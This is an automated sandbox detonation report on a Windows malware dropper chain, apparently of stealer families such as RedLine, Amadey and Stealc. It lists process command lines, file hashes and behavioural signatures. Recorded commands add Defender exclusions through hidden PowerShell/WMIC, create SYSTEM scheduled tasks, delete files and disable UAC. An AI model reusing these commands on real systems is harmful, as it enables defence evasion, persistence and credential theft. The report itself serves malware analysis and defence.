C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x298,0x2a8,0x2ac,0x274,0x2b0,0x6b40e1d0,0x6b40e1dc,0x6b40e1e8
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\u53k.3.exe
"C:\Users\Admin\AppData\Local\Temp\u53k.3.exe"
C:\Users\Admin\Pictures\qljIlML54xtrmsfmXnFGGOr1.exe
"C:\Users\Admin\Pictures\qljIlML54xtrmsfmXnFGGOr1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6608 -ip 6608
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7044 -ip 7044
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1244
C:\Users\Admin\AppData\Local\Temp\7zS6B62.tmp\Install.exe
.\Install.exe /RvdidblCuX "385118" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Program Files (x86)\GameServerClient\GameServerClient.exe
"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\ULdqcYh.exe\" em /wwsite_idwFX 385118 /S" /V1 /F
C:\Windows\Temp\698902.exe
"C:\Windows\Temp\698902.exe" --list-devices
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Temp\977504.exe
"C:\Windows\Temp\977504.exe" --coin BTC -m ADDRESSES -t 0 --range 341f25d3c80000000:341f25d3cc0000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0xd06038,0xd06044,0xd06050
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
Network
Files
C:\Users\Admin\Pictures\x1QvVUZFYeu0W5aS8JUXZFtT.exe
| MD5 | 798765f0771dd2d5c8d0f7bb5aedd6cf |
| SHA1 | bf9fcd00b8cb316244fc9f57117a3548afc765ea |
| SHA256 | 6046daa6cd975c5d43794c30ddedf28b3631eb78a183ee8c8c7fd49aba2e2bce |
| SHA512 | 594fa294f0344d9932f6ce8e7afad35673ef59882eeffc78b0554f860866e5f48043b9250a2e1905eb0f3e55053f90154c0a800c0ef5f27a661de2c15af5d7d3 |
C:\Users\Admin\Pictures\AUOJwzWUhuXoDRZSwm4I8Gsd.exe
| MD5 | 69f6614893028c60394f744c7ebc1551 |
| SHA1 | ccd4a9f86876ddbfe2bc86a2b17a4cbc1857b1dd |
| SHA256 | b96a4de2d4f97380388b6b515e8cdef28a92f358a7d487be3463828303d8661d |
| SHA512 | 4a40bcf25303accf93bb15e281a53ee0cda93c1f7c1ede741338b8080daa0a61c6751c5d11ed8ceeec520782913f748298b5016565a31f47c980d8e868461855 |
C:\Users\Admin\AppData\Local\Temp\u53k.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404251441588842212.dll
| MD5 | 45fe60d943ad11601067bc2840cc01be |
| SHA1 | 911d70a6aad7c10b52789c0312c5528556a2d609 |
| SHA256 | 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add |
| SHA512 | 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba |
memory/5796-950-0x000000006B9E0000-0x000000006BB5B000-memory.dmp
memory/5920-958-0x0000000000C70000-0x000000000114E000-memory.dmp
memory/4660-948-0x0000000000660000-0x0000000000C4B000-memory.dmp
memory/5796-960-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
C:\Users\Admin\AppData\Local\Temp\u53k.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/6608-959-0x0000000000400000-0x0000000002C4D000-memory.dmp
C:\Users\Admin\Pictures\qljIlML54xtrmsfmXnFGGOr1.exe
| MD5 | d981fb3fc1f28bea729db051c75dae08 |
| SHA1 | d5eea12045a6d998da1a362f70748fc09874d0b4 |
| SHA256 | aa5689332012817778e4ef3602e918297c567c4d573b463f86e8d98fef2eb48f |
| SHA512 | a93576bc04ac5b1ba129913c3d4e5100cf7f0f8bd7a4c9a21ce3af645624890006e087eefa5d0cbd804b7b96ebc13cf32a722b8c1d66d409879f41d5bfa974cb |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 4625a82e94e6a4781128479c369701ec |
| SHA1 | 9612a2a6ffb31827d4e0d2c8f026a9f0f73a3a65 |
| SHA256 | 757b5bb33f706c46e55f5412fec06a56a971daef7beb480f6c7c57480cd845c7 |
| SHA512 | 62ddae0aef1de67269b2c0f10811a736a9c321466aae53d098fa192733a4b2d3b9381805fe421ed21f8a94a68a2709c81a68d12c8250747a1518d4672b1754e4 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\opera_package
| MD5 | dbc1d326dc78baf7eb5026e3a1821c72 |
| SHA1 | d0dd891a6eae99513cfdd0d3b40a95b76fbe72bc |
| SHA256 | acb6b3b9c62705efcde5c5fc48f7fd67820a72e90d88dc4fa628a31c2eb91702 |
| SHA512 | e03e69e20398b53a61538d714f3b1bf1ff3723eb94f84c6dee6f4e788ca3be7a10ef3525b426df02158bac6cf371104ae0a64b2248bd6f1092fc4c698b2adfc5 |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 5ab821a9d9ee07e2b43a09adf4179717 |
| SHA1 | bda8268438f93971b8e2ca4fccc8dbc91d740ba2 |
| SHA256 | 16e26b1e15c11ad5f6419db4417fbf8c43c1f99c9687b09834714f5ebef14b60 |
| SHA512 | a7396c1f978b4ca9fffee697871df32d2857f2e1da2c579c69ae0fb6d233aa994c76bf581524662f8460f119e96368deb809d9be5674fecac45fd13f5bd24395 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441591\additional_file0.tmp
| MD5 | 15d8c8f36cef095a67d156969ecdb896 |
| SHA1 | a1435deb5866cd341c09e56b65cdda33620fcc95 |
| SHA256 | 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8 |
| SHA512 | d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a |
Analysis: behavioral2
Detonation Overview
| Submitted | 2024-04-25 14:40 |
| Reported | 2024-04-25 14:42 |
| Platform | win11-20240412-en |
| Max time kernel | 111s |
| Max time network | 151s |
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads local data of messenger clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\7d41195f4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\7d41195f4d.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\7617c78a76.exe = "C:\\Users\\Admin\\1000013002\\7617c78a76.exe" | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\77cabe45b3738612da31d94986c46fd3a4abfeef80d3c325870b7d0a86fa4be1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000012001\amert.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000014001\7d41195f4d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe | N/A |
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameServerClient\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameServerClient\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\GameServerClient.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameServerClient\GameServerClientC.exe | C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe | N/A |
